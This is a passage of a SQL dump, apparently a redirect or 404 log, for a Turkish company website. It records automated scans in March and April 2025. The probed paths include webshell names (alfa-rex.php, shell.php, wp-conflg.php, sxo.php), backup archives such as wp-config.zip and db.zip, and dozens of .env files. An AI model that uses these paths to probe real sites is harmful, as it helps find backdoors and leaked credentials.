00:00:00',301),(39369,'http://3s-technologies.com.tr/tr/wp-admin/js/alfa-rex.php7',NULL,'http://3s-technologies.com.tr/wp-admin/js/alfa-rex.php7','',1,0,'2025-03-30 05:40:18','0000-00-00 00:00:00',301),(39370,'http://3s-technologies.com.tr/tr/.well-known/utchiha_1gb6q7of.php',NULL,'http://3s-technologies.com.tr/.well-known/utchiha_1GB6q7Of.php','',1,0,'2025-03-30 05:40:19','0000-00-00 00:00:00',301),(39371,'http://3s-technologies.com.tr/tr/css/bladeacss.php',NULL,'http://3s-technologies.com.tr/css/bladeacss.php','',1,0,'2025-03-30 05:40:20','0000-00-00 00:00:00',301),(39372,'http://3s-technologies.com.tr/tr/ff.php',NULL,'http://3s-technologies.com.tr/ff.php','',51,0,'2025-03-30 05:40:21','0000-00-00 00:00:00',301),(39373,'http://3s-technologies.com.tr/tr/ui.php',NULL,'http://3s-technologies.com.tr/ui.php','',1,0,'2025-03-30 05:40:22','0000-00-00 00:00:00',301),(39374,'http://3s-technologies.com.tr/tr/wp-content/languages/fr_fr.110.php',NULL,'http://3s-technologies.com.tr/wp-content/languages/fr_FR.110.php','',1,0,'2025-03-30 05:40:24','0000-00-00 00:00:00',301),(39375,'http://3s-technologies.com.tr/tr/.well-known/zwso.php',NULL,'http://3s-technologies.com.tr/.well-known/zwso.php','',3,0,'2025-03-30 05:40:25','0000-00-00 00:00:00',301),(39376,'http://3s-technologies.com.tr/tr/wp-content/themes/digital-download/f35.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/digital-download/f35.php','',1,0,'2025-03-30 05:40:26','0000-00-00 00:00:00',301),(39377,'http://3s-technologies.com.tr/tr/wp-content/plugins/pwnd/dedi1.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/pwnd/dedi1.php','',1,0,'2025-03-30 05:40:28','0000-00-00 00:00:00',301),(39378,'http://3s-technologies.com.tr/tr/wp-includes/blocks/site-title/index.php',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/site-title/index.php','',17,0,'2025-03-30 05:40:29','0000-00-00 00:00:00',301),(39379,'http://3s-technologies.com.tr/tr/admin-ajax.php',NULL,'http://3s-technologies.com.tr/admin-ajax.php','',22,0,'2025-03-30 05:40:31','0000-00-00 00:00:00',301),(39380,'http://3s-technologies.com.tr/tr/templates/beez3/install.php',NULL,'http://3s-technologies.com.tr/templates/beez3/install.php','',1,0,'2025-03-30 05:40:35','0000-00-00 00:00:00',301),(39381,'http://3s-technologies.com.tr/tr/images/controller.php',NULL,'http://3s-technologies.com.tr/images/controller.php','',1,0,'2025-03-30 05:40:36','0000-00-00 00:00:00',301),(39382,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/x.php',NULL,'http://3s-technologies.com.tr/wp-includes/SimplePie/x.php','',1,0,'2025-03-30 05:40:40','0000-00-00 00:00:00',301),(39383,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/content/index.php',NULL,'http://3s-technologies.com.tr/wp-includes/SimplePie/Content/index.php','',6,0,'2025-03-30 05:40:45','0000-00-00 00:00:00',301),(39384,'http://3s-technologies.com.tr/tr/wp-files.php',NULL,'http://3s-technologies.com.tr/wp-files.php','',73,0,'2025-03-30 05:40:46','0000-00-00 00:00:00',301),(39385,'http://3s-technologies.com.tr/tr/ge.php',NULL,'http://3s-technologies.com.tr/ge.php','',64,0,'2025-03-30 05:40:47','0000-00-00 00:00:00',301),(39386,'http://3s-technologies.com.tr/tr/wp-content/plugins/fix/b.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/fix/b.php','',1,0,'2025-03-30 05:40:49','0000-00-00 00:00:00',301),(39387,'http://3s-technologies.com.tr/tr/indeks.php',NULL,'http://3s-technologies.com.tr/indeks.php','',1,0,'2025-03-30 05:40:50','0000-00-00 00:00:00',301),(39388,'http://3s-technologies.com.tr/tr/wp-conf.php',NULL,'http://3s-technologies.com.tr/wp-conf.php','',42,0,'2025-03-30 05:40:53','0000-00-00 00:00:00',301),(39389,'http://3s-technologies.com.tr/tr/update/f35.php',NULL,'http://3s-technologies.com.tr/update/f35.php','',93,0,'2025-03-30 05:40:54','0000-00-00 00:00:00',301),(39390,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-block-parser-index.php',NULL,'http://3s-technologies.com.tr/wp-includes/class-wp-block-parser-index.php','',1,0,'2025-03-30 05:40:57','0000-00-00 00:00:00',301),(39391,'http://3s-technologies.com.tr/tr/wp-includes/id3',NULL,'http://3s-technologies.com.tr/wp-includes/ID3/','',155,0,'2025-03-30 05:40:58','0000-00-00 00:00:00',301),(39392,'http://3s-technologies.com.tr/tr/js/404.php',NULL,'http://3s-technologies.com.tr/js/404.php','',1,0,'2025-03-30 05:41:00','0000-00-00 00:00:00',301),(39393,'http://3s-technologies.com.tr/tr/.well-known/tiny.php',NULL,'http://3s-technologies.com.tr/.well-known/tiny.php','',3,0,'2025-03-30 05:41:03','0000-00-00 00:00:00',301),(39394,'http://3s-technologies.com.tr/tr/wp-admin/images/logo.php',NULL,'http://3s-technologies.com.tr/wp-admin/images/logo.php','',1,0,'2025-03-30 05:41:08','0000-00-00 00:00:00',301),(39395,'http://3s-technologies.com.tr/tr/wp-includes/css/wp-conflg.php',NULL,'http://3s-technologies.com.tr/wp-includes/css/wp-conflg.php','',36,0,'2025-03-30 05:41:09','0000-00-00 00:00:00',301),(39396,'http://3s-technologies.com.tr/tr/wp-includes/wp-conflg.php',NULL,'http://3s-technologies.com.tr/wp-includes/wp-conflg.php','',7,0,'2025-03-30 05:41:12','0000-00-00 00:00:00',301),(39397,'http://3s-technologies.com.tr/tr/.well-known/xin1.php',NULL,'http://3s-technologies.com.tr/.well-known/xin1.php','',4,0,'2025-03-30 05:41:14','0000-00-00 00:00:00',301),(39398,'http://3s-technologies.com.tr/tr/wp-admin/buy.php',NULL,'http://3s-technologies.com.tr/wp-admin/buy.php','',7,0,'2025-03-30 05:41:15','0000-00-00 00:00:00',301),(39399,'http://3s-technologies.com.tr/tr/zex.php',NULL,'http://3s-technologies.com.tr/zex.php','',6,0,'2025-03-30 05:41:16','0000-00-00 00:00:00',301),(39400,'http://3s-technologies.com.tr/tr/wp-content/uploads/2025/03/csibhodyxk_pnushir.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/2025/03/csibhodyxk_pnushir.php','',1,0,'2025-03-30 05:41:19','0000-00-00 00:00:00',301),(39401,'http://3s-technologies.com.tr/tr/wp-content/plugins/ubh/zwso.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/ubh/zwso.php','',1,0,'2025-03-30 05:41:20','0000-00-00 00:00:00',301),(39402,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentythree/patterns/hidden-404.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/twentytwentythree/patterns/hidden-404.php','',3,0,'2025-03-30 05:41:21','0000-00-00 00:00:00',301),(39403,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/index.php',NULL,'http://3s-technologies.com.tr/wp-includes/Text/Diff/index.php','',28,0,'2025-03-30 05:41:27','0000-00-00 00:00:00',301),(39404,'http://3s-technologies.com.tr/tr/wp-content/plugins/w0rdpr3ssnew/wp-login.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/w0rdpr3ssnew/wp-login.php','',1,0,'2025-03-30 05:41:28','0000-00-00 00:00:00',301),(39405,'http://3s-technologies.com.tr/tr/luf288xop.php',NULL,'http://3s-technologies.com.tr/luf288xop.php','',2,0,'2025-03-30 05:41:31','0000-00-00 00:00:00',301),(39406,'http://3s-technologies.com.tr/tr/networks.php',NULL,'http://3s-technologies.com.tr/networks.php','',4,0,'2025-03-30 05:41:32','0000-00-00 00:00:00',301),(39407,'http://3s-technologies.com.tr/tr/cruzmiiw.php',NULL,'http://3s-technologies.com.tr/cruzmiiw.php','',2,0,'2025-03-30 05:41:33','0000-00-00 00:00:00',301),(39408,'http://3s-technologies.com.tr/tr/rafa.php',NULL,'http://3s-technologies.com.tr/rafa.php','',4,0,'2025-03-30 05:41:35','0000-00-00 00:00:00',301),(39409,'http://3s-technologies.com.tr/tr/wp-content/plugins.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins.php','',2,0,'2025-03-30 05:41:36','0000-00-00 00:00:00',301),(39410,'http://3s-technologies.com.tr/tr/wp-content/plugins/pwnd/nakrip.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/pwnd/nakrip.php','',2,0,'2025-03-30 05:41:39','0000-00-00 00:00:00',301),(39411,'http://3s-technologies.com.tr/tr/dox.php',NULL,'http://3s-technologies.com.tr/dox.php','',20,0,'2025-03-30 05:41:40','0000-00-00 00:00:00',301),(39412,'http://3s-technologies.com.tr/tr/wp-harri.php',NULL,'http://3s-technologies.com.tr/wp-harri.php','',3,0,'2025-03-30 05:41:41','0000-00-00 00:00:00',301),(39413,'http://3s-technologies.com.tr/tr/fosil.php',NULL,'http://3s-technologies.com.tr/fosil.php','',7,0,'2025-03-30 05:41:42','0000-00-00 00:00:00',301),(39414,'http://3s-technologies.com.tr/tr/wp-content/plugins/w0rdpr3ssnew/about.phpp',NULL,'http://3s-technologies.com.tr/wp-content/plugins/w0rdpr3ssnew/about.phpp','',1,0,'2025-03-30 05:41:43','0000-00-00 00:00:00',301),(39415,'http://3s-technologies.com.tr/tr/wp-includes/js/crop/index.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/crop/index.php','',12,0,'2025-03-30 05:41:48','0000-00-00 00:00:00',301),(39416,'http://3s-technologies.com.tr/tr/index/sxo.php',NULL,'http://3s-technologies.com.tr/index/sxo.php','',1,0,'2025-03-30 05:41:50','0000-00-00 00:00:00',301),(39417,'http://3s-technologies.com.tr/tr/sxo.php',NULL,'http://3s-technologies.com.tr/sxo.php','',25,0,'2025-03-30 05:41:51','0000-00-00 00:00:00',301),(39418,'http://3s-technologies.com.tr/tr/wp-admin/maint/sxo.php',NULL,'http://3s-technologies.com.tr/wp-admin/maint/sxo.php','',1,0,'2025-03-30 05:41:52','0000-00-00 00:00:00',301),(39419,'http://3s-technologies.com.tr/tr/wp-content/upgrade/sxo.php',NULL,'http://3s-technologies.com.tr/wp-content/upgrade/sxo.php','',1,0,'2025-03-30 05:41:53','0000-00-00 00:00:00',301),(39420,'http://3s-technologies.com.tr/tr/wp-content/sxo.php',NULL,'http://3s-technologies.com.tr/wp-content/sxo.php','',1,0,'2025-03-30 05:41:54','0000-00-00 00:00:00',301),(39421,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/sxo.php',NULL,'http://3s-technologies.com.tr/wp-includes/rest-api/sxo.php','',1,0,'2025-03-30 05:41:55','0000-00-00 00:00:00',301),(39422,'http://3s-technologies.com.tr/tr/wp-admin/sxo.php',NULL,'http://3s-technologies.com.tr/wp-admin/sxo.php','',1,0,'2025-03-30 05:41:57','0000-00-00 00:00:00',301),(39423,'http://3s-technologies.com.tr/tr/wp-content/plugins/erinyani/sxo.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/erinyani/sxo.php','',1,0,'2025-03-30 05:41:58','0000-00-00 00:00:00',301),(39424,'http://3s-technologies.com.tr/tr/about/sxo.php',NULL,'http://3s-technologies.com.tr/about/sxo.php','',6,0,'2025-03-30 05:41:59','0000-00-00 00:00:00',301),(39425,'http://3s-technologies.com.tr/tr/vendor/phpunit/phpunit/src/util/php/sxo.php',NULL,'http://3s-technologies.com.tr/vendor/phpunit/phpunit/src/Util/PHP/sxo.php','',1,0,'2025-03-30 05:42:00','0000-00-00 00:00:00',301),(39426,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/sxo.php',NULL,'http://3s-technologies.com.tr/wp-admin/css/colors/blue/sxo.php','',1,0,'2025-03-30 05:42:01','0000-00-00 00:00:00',301),(39427,'http://3s-technologies.com.tr/tr/wp-content/plugins/background-image-cropper/sxo.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/background-image-cropper/sxo.php','',1,0,'2025-03-30 05:42:02','0000-00-00 00:00:00',301),(39428,'http://3s-technologies.com.tr/tr/wp-admin/js/sxo.php',NULL,'http://3s-technologies.com.tr/wp-admin/js/sxo.php','',1,0,'2025-03-30 05:42:04','0000-00-00 00:00:00',301),(39429,'http://3s-technologies.com.tr/tr/wp-content/plugins/pwnd/sxo.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/pwnd/sxo.php','',1,0,'2025-03-30 05:42:05','0000-00-00 00:00:00',301),(39430,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/sxo.php',NULL,'http://3s-technologies.com.tr/wp-admin/js/widgets/sxo.php','',1,0,'2025-03-30 05:42:06','0000-00-00 00:00:00',301),(39431,'http://3s-technologies.com.tr/tr/wp-includes/sxo.php',NULL,'http://3s-technologies.com.tr/wp-includes/sxo.php','',1,0,'2025-03-30 05:42:07','0000-00-00 00:00:00',301),(39432,'http://3s-technologies.com.tr/tr/js/index.php',NULL,'http://3s-technologies.com.tr/js/index.php','',4,0,'2025-03-30 05:42:09','0000-00-00 00:00:00',301),(39433,'http://3s-technologies.com.tr/tr/function/function.php',NULL,'http://3s-technologies.com.tr/function/function.php','',100,0,'2025-03-30 05:42:12','0000-00-00 00:00:00',301),(39434,'http://3s-technologies.com.tr/tr/wp-includes/js/classwithtostring.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/classwithtostring.php','',1,0,'2025-03-30 05:42:16','0000-00-00 00:00:00',301),(39435,'http://3s-technologies.com.tr/tr/chosen/function.php',NULL,'http://3s-technologies.com.tr/chosen/function.php','',10,0,'2025-03-30 05:42:17','0000-00-00 00:00:00',301),(39436,'http://3s-technologies.com.tr/tr/wp-admin/includes/admin.php',NULL,'http://3s-technologies.com.tr/wp-admin/includes/admin.php','',6,0,'2025-03-30 05:42:18','0000-00-00 00:00:00',301),(39437,'http://3s-technologies.com.tr/tr/wp-includes/customize/chosen.php',NULL,'http://3s-technologies.com.tr/wp-includes/customize/chosen.php','',79,0,'2025-03-30 05:42:20','0000-00-00 00:00:00',301),(39438,'http://3s-technologies.com.tr/tr/.well-known/ggmdjzys.php',NULL,'http://3s-technologies.com.tr/.well-known/ggmdjzys.php','',1,0,'2025-03-30 05:42:21','0000-00-00 00:00:00',301),(39439,'http://3s-technologies.com.tr/tr/.well-known/awraulub.php',NULL,'http://3s-technologies.com.tr/.well-known/awraulub.php','',3,0,'2025-03-30 05:42:22','0000-00-00 00:00:00',301),(39440,'http://3s-technologies.com.tr/tr/img/lock.php',NULL,'http://3s-technologies.com.tr/img/lock.php','',1,0,'2025-03-30 05:42:24','0000-00-00 00:00:00',301),(39441,'http://3s-technologies.com.tr/tr/wp-includes/buy.php',NULL,'http://3s-technologies.com.tr/wp-includes/buy.php','',28,0,'2025-03-30 05:42:25','0000-00-00 00:00:00',301),(39442,'http://3s-technologies.com.tr/tr/alfa_data/index.php',NULL,'','',55,0,'2025-03-30 06:32:47','0000-00-00 00:00:00',301),(39443,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/moon.php',NULL,'','',21,0,'2025-03-30 06:32:48','0000-00-00 00:00:00',301),(39444,'http://3s-technologies.com.tr/tr/wp-content/themes/wp-pridmag/up.php',NULL,'','',28,0,'2025-03-30 06:32:48','0000-00-00 00:00:00',301),(39445,'http://3s-technologies.com.tr/tr/wp-includes/html-api/alfa-rex.php',NULL,'','',16,0,'2025-03-30 06:32:49','0000-00-00 00:00:00',301),(39446,'http://3s-technologies.com.tr/tr/wp-admin/includes/m.php',NULL,'','',15,0,'2025-03-30 06:32:50','0000-00-00 00:00:00',301),(39447,'http://3s-technologies.com.tr/tr/admin/fckeditor/editor/filemanager/alfanew.php',NULL,'','',15,0,'2025-03-30 06:32:51','0000-00-00 00:00:00',301),(39448,'http://3s-technologies.com.tr/tr/wp-includes/ixr/shell.php',NULL,'','',22,0,'2025-03-30 06:32:52','0000-00-00 00:00:00',301),(39449,'http://3s-technologies.com.tr/tr/wp-admin/wp-conflg.php',NULL,'','',157,0,'2025-03-30 06:32:54','0000-00-00 00:00:00',301),(39450,'http://3s-technologies.com.tr/tr/wp-includes/requests/utility/alfa-rex.php',NULL,'','',15,0,'2025-03-30 06:32:54','0000-00-00 00:00:00',301),(39451,'http://3s-technologies.com.tr/tr/wp-content/upgrade-temp-backup/ty.php',NULL,'','',15,0,'2025-03-30 06:32:55','0000-00-00 00:00:00',301),(39452,'http://3s-technologies.com.tr/tr/.well-known/content.php',NULL,'','',52,0,'2025-03-30 06:32:56','0000-00-00 00:00:00',301),(39453,'http://3s-technologies.com.tr/tr/index/index.php',NULL,'','',26,0,'2025-03-30 06:32:56','0000-00-00 00:00:00',301),(39454,'http://3s-technologies.com.tr/tr/include/wp-configs.php',NULL,'','',19,0,'2025-03-30 06:32:57','0000-00-00 00:00:00',301),(39455,'http://3s-technologies.com.tr/tr/wp-admin/js/chosen.php',NULL,'','',32,0,'2025-03-30 06:32:58','0000-00-00 00:00:00',301),(39456,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/alfa-rex.php',NULL,'','',16,0,'2025-03-30 06:32:59','0000-00-00 00:00:00',301),(39457,'http://3s-technologies.com.tr/tr/bg/xmrlpc.php',NULL,'','',15,0,'2025-03-30 06:32:59','0000-00-00 00:00:00',301),(39458,'http://3s-technologies.com.tr/tr/wp-content/plugins/core-plugin/file-manager.php',NULL,'','',15,0,'2025-03-30 06:33:00','0000-00-00 00:00:00',301),(39459,'http://3s-technologies.com.tr/tr/wp-content/uploads/423_index.php',NULL,'','',17,0,'2025-03-30 06:33:00','0000-00-00 00:00:00',301),(39460,'http://3s-technologies.com.tr/tr/wp-admin/network/wp-conflg.php',NULL,'','',90,0,'2025-03-30 06:33:01','0000-00-00 00:00:00',301),(39461,'http://3s-technologies.com.tr/tr/wp-admin/byp.php',NULL,'','',15,0,'2025-03-30 06:33:02','0000-00-00 00:00:00',301),(39462,'http://3s-technologies.com.tr/tr/wp-includes/theme-compat/index.php',NULL,'','',34,0,'2025-03-30 06:33:02','0000-00-00 00:00:00',301),(39463,'http://3s-technologies.com.tr/tr/wp-content/wp-login.php',NULL,'','',26,0,'2025-03-30 06:33:03','0000-00-00 00:00:00',301),(39464,'http://3s-technologies.com.tr/tr/admin/editor/engine.php',NULL,'','',23,0,'2025-03-30 06:33:04','0000-00-00 00:00:00',301),(39465,'http://3s-technologies.com.tr/tr/wp-includes/images/smilies/index.php',NULL,'','',61,0,'2025-03-30 06:33:05','0000-00-00 00:00:00',301),(39466,'http://3s-technologies.com.tr/tr/wp-includes/html-api/about.php',NULL,'','',38,0,'2025-03-30 06:33:06','0000-00-00 00:00:00',301),(39467,'http://3s-technologies.com.tr/tr/wp-includes/images/smilies/about.php',NULL,'','',71,0,'2025-03-30 06:33:07','0000-00-00 00:00:00',301),(39468,'http://3s-technologies.com.tr/tr/assets/plugins/jquery-file-upload/server/php/include.php',NULL,'','',18,0,'2025-03-30 06:33:07','0000-00-00 00:00:00',301),(39469,'http://3s-technologies.com.tr/tr/images/lmfi2.php',NULL,'','',21,0,'2025-03-30 06:33:08','0000-00-00 00:00:00',301),(39470,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/alfa-rex.php',NULL,'','',27,0,'2025-03-30 06:33:09','0000-00-00 00:00:00',301),(39471,'http://3s-technologies.com.tr/tr/images/chosen.php',NULL,'','',23,0,'2025-03-30 06:33:10','0000-00-00 00:00:00',301),(39472,'http://3s-technologies.com.tr/tr/wp-includes/requests/file.php',NULL,'','',19,0,'2025-03-30 06:33:12','0000-00-00 00:00:00',301),(39473,'http://3s-technologies.com.tr/tr/wp-content/themes/seotheme/classwithtostring.php',NULL,'','',18,0,'2025-03-30 06:33:12','0000-00-00 00:00:00',301),(39474,'http://3s-technologies.com.tr/tr/wp-includes/widgets/parx.php',NULL,'','',15,0,'2025-03-30 06:33:13','0000-00-00 00:00:00',301),(39475,'http://3s-technologies.com.tr/tr/wp-content/plugins/cache/footer.php',NULL,'','',16,0,'2025-03-30 06:33:13','0000-00-00 00:00:00',301),(39476,'http://3s-technologies.com.tr/tr/wp-admin/includes/cong.php',NULL,'','',21,0,'2025-03-30 06:33:16','0000-00-00 00:00:00',301),(39477,'http://3s-technologies.com.tr/tr/wp-admin/network/shell.php',NULL,'','',18,0,'2025-03-30 06:33:17','0000-00-00 00:00:00',301),(39478,'http://3s-technologies.com.tr/tr/wp-includes/images/smilies/wp-login.php',NULL,'','',24,0,'2025-03-30 06:33:17','0000-00-00 00:00:00',301),(39479,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/lock.php',NULL,'','',23,0,'2025-03-30 06:33:19','0000-00-00 00:00:00',301),(39480,'http://3s-technologies.com.tr/tr/wp-content/plugins/pwnd/classwithtostring.php',NULL,'','',15,0,'2025-03-30 06:33:20','0000-00-00 00:00:00',301),(39481,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/renderer/about.php',NULL,'','',27,0,'2025-03-30 06:33:20','0000-00-00 00:00:00',301),(39482,'http://3s-technologies.com.tr/tr/.well-known/cache-compat.php',NULL,'','',15,0,'2025-03-30 06:33:22','0000-00-00 00:00:00',301),(39483,'http://3s-technologies.com.tr/tr/wp-mail.php/wp-includes/id3/rnepv9.php',NULL,'','',26,0,'2025-03-30 06:33:23','0000-00-00 00:00:00',301),(39484,'http://3s-technologies.com.tr/tr/wp-includes/php-compat/content.php',NULL,'','',15,0,'2025-03-30 06:33:23','0000-00-00 00:00:00',301),(39485,'http://3s-technologies.com.tr/tr/wp-includes/fonts/admin.php',NULL,'','',100,0,'2025-03-30 06:33:24','0000-00-00 00:00:00',301),(39486,'http://3s-technologies.com.tr/tr/wp-includes/images/autoload_classmap.php',NULL,'','',25,0,'2025-03-30 06:33:26','0000-00-00 00:00:00',301),(39487,'http://3s-technologies.com.tr/tr/css/install.php',NULL,'','',24,0,'2025-03-30 06:33:27','0000-00-00 00:00:00',301),(39488,'http://3s-technologies.com.tr/tr/wp-includes/theme-compat/wp-conflg.php/wp-content/plugins/google-seo-rank/index.php',NULL,'','',27,0,'2025-03-30 06:33:27','0000-00-00 00:00:00',301),(39489,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/classwithtostring.php',NULL,'','',17,0,'2025-03-30 06:33:29','0000-00-00 00:00:00',301),(39490,'http://3s-technologies.com.tr/tr/wp-includes/fonts/install.php',NULL,'','',19,0,'2025-03-30 06:33:30','0000-00-00 00:00:00',301),(39491,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/engine/wp-login.php',NULL,'','',36,0,'2025-03-30 06:33:32','0000-00-00 00:00:00',301),(39492,'http://3s-technologies.com.tr/tr/wp-admin/user/chosen.php',NULL,'','',46,0,'2025-03-30 06:33:32','0000-00-00 00:00:00',301),(39493,'http://3s-technologies.com.tr/tr/wp-includes/ixr/alfa-rex.php',NULL,'','',17,0,'2025-03-30 06:33:34','0000-00-00 00:00:00',301),(39494,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/src/index.php',NULL,'','',31,0,'2025-03-30 06:33:35','0000-00-00 00:00:00',301),(39495,'http://3s-technologies.com.tr/tr/wp-includes/css/alfa-rex.php',NULL,'','',30,0,'2025-03-30 06:33:36','0000-00-00 00:00:00',301),(39496,'http://3s-technologies.com.tr/tr/images/stories/admin-post.php',NULL,'','',17,0,'2025-03-30 06:33:36','0000-00-00 00:00:00',301),(39497,'http://3s-technologies.com.tr/tr/wp-content/plugins/security-malware-firewall/readme.txt',NULL,'','',1,0,'2025-03-30 07:48:13','0000-00-00 00:00:00',301),(39498,'http://3s-technologies.com.tr/tr/data.zip',NULL,'','',3,0,'2025-04-01 03:19:09','0000-00-00 00:00:00',301),(39499,'http://3s-technologies.com.tr/tr/temp.zip',NULL,'','',2,0,'2025-04-01 03:19:10','0000-00-00 00:00:00',301),(39500,'http://3s-technologies.com.tr/tr/main.zip',NULL,'','',1,0,'2025-04-01 03:19:11','0000-00-00 00:00:00',301),(39501,'http://3s-technologies.com.tr/tr/content.zip',NULL,'','',1,0,'2025-04-01 03:20:14','0000-00-00 00:00:00',301),(39502,'http://3s-technologies.com.tr/tr/arc.zip',NULL,'','',1,0,'2025-04-01 03:20:15','0000-00-00 00:00:00',301),(39503,'http://3s-technologies.com.tr/tr/new.zip',NULL,'','',2,0,'2025-04-01 03:20:16','0000-00-00 00:00:00',301),(39504,'https://3s-technologies.com.tr/wp-json/buddypress/v1/signup',NULL,'','',2,0,'2025-04-02 22:31:02','0000-00-00 00:00:00',301),(39505,'https://3s-technologies.com.tr/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',NULL,'','',2,0,'2025-04-02 22:31:02','0000-00-00 00:00:00',301),(39506,'http://3s-technologies.com.tr/tr/wp-content/plugins/wpdiscuz/readme.txt',NULL,'','',1,0,'2025-04-04 12:29:51','0000-00-00 00:00:00',301),(39507,'http://3s-technologies.com.tr/tr/wp-config.php.zip',NULL,'','',1,0,'2025-04-04 22:49:09','0000-00-00 00:00:00',301),(39508,'http://3s-technologies.com.tr/tr/wp-config.zip',NULL,'','',1,0,'2025-04-04 22:49:09','0000-00-00 00:00:00',301),(39509,'http://3s-technologies.com.tr/tr/wpconfig.zip',NULL,'','',1,0,'2025-04-04 22:49:10','0000-00-00 00:00:00',301),(39510,'http://3s-technologies.com.tr/tr/dbconfig.zip',NULL,'','',1,0,'2025-04-04 22:50:23','0000-00-00 00:00:00',301),(39511,'http://3s-technologies.com.tr/tr/db.zip',NULL,'','',1,0,'2025-04-04 22:50:24','0000-00-00 00:00:00',301),(39512,'http://3s-technologies.com.tr/tr/config.zip',NULL,'','',1,0,'2025-04-04 22:50:25','0000-00-00 00:00:00',301),(39513,'http://3s-technologies.com.tr/tr/www.3s-technologies.com.tr.zip',NULL,'','',1,0,'2025-04-05 04:12:53','0000-00-00 00:00:00',301),(39514,'https://3s-technologies.com.tr/tr/emergency.php',NULL,'https://3s-technologies.com.tr/emergency.php','',1,0,'2025-04-06 08:07:06','0000-00-00 00:00:00',301),(39515,'https://3s-technologies.com.tr/tr/reset.php',NULL,'https://3s-technologies.com.tr/reset.php','',1,0,'2025-04-06 08:07:07','0000-00-00 00:00:00',301),(39516,'https://3s-technologies.com.tr/tr/pass.php',NULL,'https://3s-technologies.com.tr/pass.php','',1,0,'2025-04-06 08:07:09','0000-00-00 00:00:00',301),(39517,'https://3s-technologies.com.tr/tr/webapp/server/tests/test.env',NULL,'','',1,0,'2025-04-07 20:57:50','0000-00-00 00:00:00',301),(39518,'https://3s-technologies.com.tr/tr/example.env',NULL,'','',1,0,'2025-04-07 20:57:54','0000-00-00 00:00:00',301),(39519,'https://3s-technologies.com.tr/tr/environ.env',NULL,'','',1,0,'2025-04-07 20:57:55','0000-00-00 00:00:00',301),(39520,'https://3s-technologies.com.tr/tr/server/config/dev.env',NULL,'','',1,0,'2025-04-07 20:57:56','0000-00-00 00:00:00',301),(39521,'https://3s-technologies.com.tr/tr/config/dev.env',NULL,'','',1,0,'2025-04-07 20:57:57','0000-00-00 00:00:00',301),(39522,'https://3s-technologies.com.tr/tr/config/staging.env',NULL,'','',1,0,'2025-04-07 20:57:58','0000-00-00 00:00:00',301),(39523,'https://3s-technologies.com.tr/tr/example/example.env',NULL,'','',1,0,'2025-04-07 20:57:59','0000-00-00 00:00:00',301),(39524,'https://3s-technologies.com.tr/tr/app/.env.example',NULL,'','',1,0,'2025-04-07 20:58:00','0000-00-00 00:00:00',301),(39525,'https://3s-technologies.com.tr/tr/.local.env',NULL,'','',1,0,'2025-04-07 20:58:00','0000-00-00 00:00:00',301),(39526,'https://3s-technologies.com.tr/tr/infra/infra.env',NULL,'','',1,0,'2025-04-07 20:58:01','0000-00-00 00:00:00',301),(39527,'https://3s-technologies.com.tr/tr/infra.env',NULL,'','',1,0,'2025-04-07 20:58:02','0000-00-00 00:00:00',301),(39528,'https://3s-technologies.com.tr/tr/.docker.env',NULL,'','',1,0,'2025-04-07 20:58:03','0000-00-00 00:00:00',301),(39529,'https://3s-technologies.com.tr/tr/configurations/env/mailer.env',NULL,'','',1,0,'2025-04-07 20:58:03','0000-00-00 00:00:00',301),(39530,'https://3s-technologies.com.tr/tr/env/mailer.env',NULL,'','',1,0,'2025-04-07 20:58:04','0000-00-00 00:00:00',301),(39531,'https://3s-technologies.com.tr/tr/mailer.env',NULL,'','',1,0,'2025-04-07 20:58:05','0000-00-00 00:00:00',301),(39532,'https://3s-technologies.com.tr/tr/server/env/.dev.env',NULL,'','',1,0,'2025-04-07 20:58:06','0000-00-00 00:00:00',301),(39533,'https://3s-technologies.com.tr/tr/env/.dev.env',NULL,'','',1,0,'2025-04-07 20:58:06','0000-00-00 00:00:00',301),(39534,'https://3s-technologies.com.tr/tr/.dev.env',NULL,'','',1,0,'2025-04-07 20:58:07','0000-00-00 00:00:00',301),(39535,'https://3s-technologies.com.tr/tr/config.env',NULL,'','',2,0,'2025-04-07 20:58:08','0000-00-00 00:00:00',301),(39536,'https://3s-technologies.com.tr/tr/backend/app/.env',NULL,'','',1,0,'2025-04-07 20:58:08','0000-00-00 00:00:00',301),(39537,'https://3s-technologies.com.tr/tr/laravel-5.1/.env',NULL,'','',1,0,'2025-04-07 20:58:10','0000-00-00 00:00:00',301),(39538,'https://3s-technologies.com.tr/tr/demo.env',NULL,'','',1,0,'2025-04-07 20:58:10','0000-00-00 00:00:00',301),(39539,'https://3s-technologies.com.tr/tr/django.env',NULL,'','',1,0,'2025-04-07 20:58:12','0000-00-00 00:00:00',301),(39540,'https://3s-technologies.com.tr/tr/.example.env',NULL,'','',1,0,'2025-04-07 20:58:13','0000-00-00 00:00:00',301),(39541,'https://3s-technologies.com.tr/tr/.ci/.env.ci',NULL,'','',1,0,'2025-04-07 20:58:14','0000-00-00 